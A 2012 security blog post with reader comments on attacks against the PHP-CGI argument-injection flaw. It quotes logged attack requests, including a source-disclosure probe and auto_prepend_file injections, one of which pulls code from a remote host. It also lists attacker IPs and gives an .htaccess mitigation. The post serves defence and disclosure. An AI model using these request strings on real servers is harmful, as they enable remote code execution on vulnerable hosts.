PHP-CGI Vulnerability Exploited in the Wild

  • May 8, 2012

When the PHP-CGI vulnerability was disclosed, we knew it would be just a matter of days before it started to be exploited in the wild.

Well, it didn’t take long. Since the weekend, we started to see scanners looking for that vulnerability on our servers and honeypots. And now we are seeing sites getting compromised through it as well.

Understanding the Attack

So far we noticed that the attack starts in two ways, either by checking if the server is vulnerable using the ?-s option (which shows the source of the page):

88.198.51.36 – – [06/May/2012:07:51:36 -0400] “GET /index.php?-s HTTP/1.1″ 301

Or by including the content of the PHP input (or of an external shell):

84.247.61.27 – – [07/May/2012:17:16:58 -0400] “POST /?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1” 301 – “-” “-”

If the attacker succeeds, it will upload a backdoor to the compromised site in a random location of the file system and use that to continue exploiting the server.

It is also important to note that even though we are only seeing those two “flags” being used (-s and -d), php-cgi has many options and any of them can be used:

$ php-cgi -h
-a Run interactively
-b | Bind Path for external FASTCGI Server mode
-C Do not chdir to the script’s directory
-c | Look for php.ini file in this directory
-n No php.ini file will be used
-d foo[=bar] Define INI entry foo with value ‘bar’
-e Generate extended information for debugger/profiler
-f Parse . Implies `-q’
-h This help
-i PHP information
-l Syntax check only (lint)
-m Show compiled in modules
-q Quiet-mode. Suppress HTTP Header output.
-s Display colour syntax highlighted source.
-v Version number
-w Display source with stripped comments and whitespace.
-z Load Zend extension .
-T Measure execution time of script repeated times.

Attacker IP addresses

Via our honeypots, we detected the following IP addresses trying to exploit this vulnerability:

# [Number of hits] [IP Address]
191 85.114.141.40
120 91.224.160.132
44 84.247.61.27
32 94.242.199.77
18 91.227.142.126
10 80.244.248.70
7 88.228.101.221
5 190.245.104.190
5 88.228.104.94
5 88.228.114.235
3 71.163.209.143
2 177.8.168.3
2 88.228.122.158
2 190.44.25.254
2 88.198.51.36
1 91.77.240.51

And this number is probably going to grow even more.

Protecting yourself

The PHP guys are recommending the following .htaccess hack to block those attacks:

RewriteEngine on
RewriteCond %{QUERY_STRING} ^[^=]*$
RewriteCond %{QUERY_STRING} %2d|- [NC]
RewriteRule .? – [F,L]

But the best option is to update PHP ASAP (a fix is available for it already), or stop using the CGI setup and move to to the PHP module (if using Apache), or Fast CGI.

More details to come!

Update 1:
*Facebook is playing with this vulnerability and added the following job link on their page: https://facebook.com/?-s (for anyone that is probing for this):

include_once ‘https://www.facebook.com/careers/department?dept=engineering&req=a2KA0000000Lt8LMAS’;

Daniel B. Cid is Founder of Sucuri and the VP of Engineering for the GoDaddy Security Products group. He is also the founder of OSSEC and CleanBrowsing. You can find more about Daniel on his site dcid.me or on Twitter: @danielcid

Related Tags
15 comments
  2. Pingback: Sucuri WordPress Security Plugin Protects Against PHP-CGI Vulnerability | Sucuri
  3. Pingback: » PHP-CGI Exploit is in the wild. Get protected ASAP. Geekamongus Tech Blog & Forums
  4. Pingback: PHP CGI 漏洞 與 Facebook 解法 - 2012 | Tsung's Blog
  5. Pingback: OSSEC rule for the PHP-CGI vulnerability | Daniel Cid

  6. Until WHM/CPanel comes out with an update, is it possible to thwart this at a server level, or would we need to add that snippet to every website’s htaccess file?  

  7. Pingback: PHP patches critical CGI vulnerability - HackerMuslim.com | HackerMuslim.com
  8. Pingback: Can you have a website virus?

  9. good stuff. keep it up. have a look on this also.
     http://www.securitytube.net/groups?operation=view&groupId=7

  10. Pingback: Investigando um phishing | Bootando…

  11. In C:WINDOWSsystem32LogFilesHTTPERR
    I discovered entries such as:

    2012-06-20 20:59:21 122.183.65.5 59537 ***.***.***.*** 80 HTTP/1.1 POST /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://216.67.238.249/images/api.gif%20-n/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://216.67.238.249/images/api.gif%20-n 411 – LengthRequired –

    Using tool: http://www.webtoolhub.com/tn561351-url-deobfuscator.aspx
    That URL deobfuscates to:

    /?-d allow_url_include=On+-d auto_prepend_file=http://216.67.238.249/images/api.gif -n/?-d allow_url_include=On+-d auto_prepend_file=http://216.67.238.249/images/api.gif -n

    Note the IPs referenced:
    216.67.238.249
    122.183.65.5
     

  12. Pingback: WordPress Security – Cutting Through The BS | Sucuri Blog
  13. Pingback: Dealing with WordPress Malware | Sucuri Blog
  15. Pingback: Plesk 0-day Remote Vulnerability in the Wild | Sucuri Blog

Comments are closed.

Related Categories
You May Also Like